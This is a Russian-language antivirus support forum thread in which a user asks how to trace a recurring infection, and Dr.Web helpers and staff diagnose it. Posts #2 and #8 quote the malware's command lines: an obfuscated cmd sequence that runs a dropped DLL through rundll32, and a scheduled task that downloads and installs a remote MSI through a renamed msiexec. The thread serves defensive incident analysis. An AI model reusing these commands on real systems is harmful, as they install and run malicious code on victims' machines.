Перейти к содержимому


Фото
- - - - -

Регулярно срабатывает превентивная защита


  • Please log in to reply
9 ответов в этой теме

#1 Ilyun

Ilyun

    Newbie

  • Posters
  • 5 Сообщений:

Отправлено 20 Октябрь 2018 - 12:27

Приветствую!

 

Проблема следующая: DrWeb регулярно блокирует исполнение неавторизованного кода,

запускаемого через svchost, или обнаруживает троянца.

Проблема давняя, проявляется только когда ноут подключен к сети.

Кто является источником, какое приложение заражено - не понятно.

 

Вопрос - каким образом можно определить источник заражения?

 

Отчет для техподдержки в приложении.

Прикрепленные файлы:



#2 Dmitry_rus

Dmitry_rus

    Guru

  • Helpers
  • 3 623 Сообщений:

Отправлено 20 Октябрь 2018 - 12:41

В каталоге \Users\KO-6\AppData\Roaming\Microsoft\Windows\Templates\IE.Coockies\ лежат вредоносные файлы. Очень желательно их запаковать - и в вирлаб на изучение. Запускается что-то вроде такого:

cmd: C:\windows\system32\cmd.exe /c ""C:\Users\KO-6\AppData\Roaming\Microsoft\Windows\Templates\\IE.Coockies\f.bat"
cmd: "cmd" /c "cd "C:\Users\KO-6\AppData\Roaming\Microsoft\Windows\Templates\\IE.Coockies\"&hf -o -P namr update.dat"
drop new executable: \Device\HarddiskVolume2\Users\KO-6\AppData\Roaming\Microsoft\Windows\Templates\IE.Coockies\x32Frame.dll
cmd: "cmd" /v:on /c "set ddcz=dll32&set uw=run&set ou=%time:~6,2%%time:~0,2%%time:~3,2%&mKdir "C:\Users\KO-6\AppData\Roaming\Microsoft\Windows\Templates\\IE.Coockies\!ou!"&cd "C:\Users\KO-6\AppData\Roaming\Microsoft\Windows\Templates\\IE.Coockies\!ou!\"&move /y "C:\Users\KO-6\AppData\Roaming\Microsoft\Windows\Templates\\IE.Coockies\*.*" "C:\Users\KO-6\AppData\Roaming\Microsoft\Windows\Templates\\IE.Coockies\!ou!"\&!uw!!ddcz! x32Frame.dll,Entry u"


#3 Ilyun

Ilyun

    Newbie

  • Posters
  • 5 Сообщений:

Отправлено 20 Октябрь 2018 - 14:12

Да, еще.

Зашел в защищенном режиме - файла xFrame32.dll в указанных папках не было.



#4 maxic

maxic

    Keep yourself alive

  • Moderators
  • 12 814 Сообщений:

Отправлено 20 Октябрь 2018 - 14:46

Ilyun, ваше сообщение скрыто. На форум запрещено выкладывать (потенциально) вредоносные файлы, читайте правила. Считайте это неофициальным предупреждением.

Судя по номеру тикета, вы отправили файлы не в поддержку, а в вирлаб.



#5 Ilyun

Ilyun

    Newbie

  • Posters
  • 5 Сообщений:

Отправлено 20 Октябрь 2018 - 14:52

Ага. Я тут впервые, не со зла.

Сообщение с файлами отправил через поддержку на официальном сайте,

пришел ответ от робота

Virus Monitoring Service Doctor Web Ltd. <vms@rt-web.dev.drweb.com>

Этого достаточно?


Сообщение было изменено Ilyun: 20 Октябрь 2018 - 14:55


#6 maxic

maxic

    Keep yourself alive

  • Moderators
  • 12 814 Сообщений:

Отправлено 20 Октябрь 2018 - 16:04

Ilyun, вирус мониторинг. Это вирлаб. Поддержка здесь: https://support.drweb.ru/support_wizard/?lng=ru

Но вы верно отправили файл, в вирлаб его и надо.



#7 RomaNNN

RomaNNN

    Ковальски

  • Posters
  • 6 001 Сообщений:

Отправлено 22 Октябрь 2018 - 13:49

Явно какая-то малварь. Хвала защите от инжектов :)
Если есть два способа, простой и сложный, то выбирай сложный, так как он проще простого способа, который тоже сложный, но ещё и кривой.

#8 Konstantin Yudin

Konstantin Yudin

    Смотрящий

  • Dr.Web Staff
  • 19 552 Сообщений:

Отправлено 22 Октябрь 2018 - 14:00

таска в планировщике скачивает и стартует msi, C:\Users\KO-6\AppData\Roaming\FylAzgbiyo.exe /q /i hxxp://freshner2h.xxxxx/4n8v4mTl.m86
FylAzgbiyo.exe это msiexec
With best regards, Konstantin Yudin
Doctor Web, Ltd.

#9 Konstantin Yudin

Konstantin Yudin

    Смотрящий

  • Dr.Web Staff
  • 19 552 Сообщений:

Отправлено 22 Октябрь 2018 - 14:01

12 версия такое вылечит и без сигнатур
вам лучше в помощь по лечению и с правильными отчетами
With best regards, Konstantin Yudin
Doctor Web, Ltd.

#10 Ilyun

Ilyun

    Newbie

  • Posters
  • 5 Сообщений:

Отправлено 22 Октябрь 2018 - 17:30

В общем поставил на сканирование.

За 18 часов нашлось много всякого, в т.ч. и в планировщике.

Пока вроде стало тихо.

 

Первое сообщение написал потому, что проблема с разной периодичностью вылазила уже с год,

и раньше полное сканирование, в т.ч. CureIt с загрузочной флешки особо не помогало.

 

Однако, спасибо за участие.




Читают тему: 0

0 пользователей, 0 гостей, 0 скрытых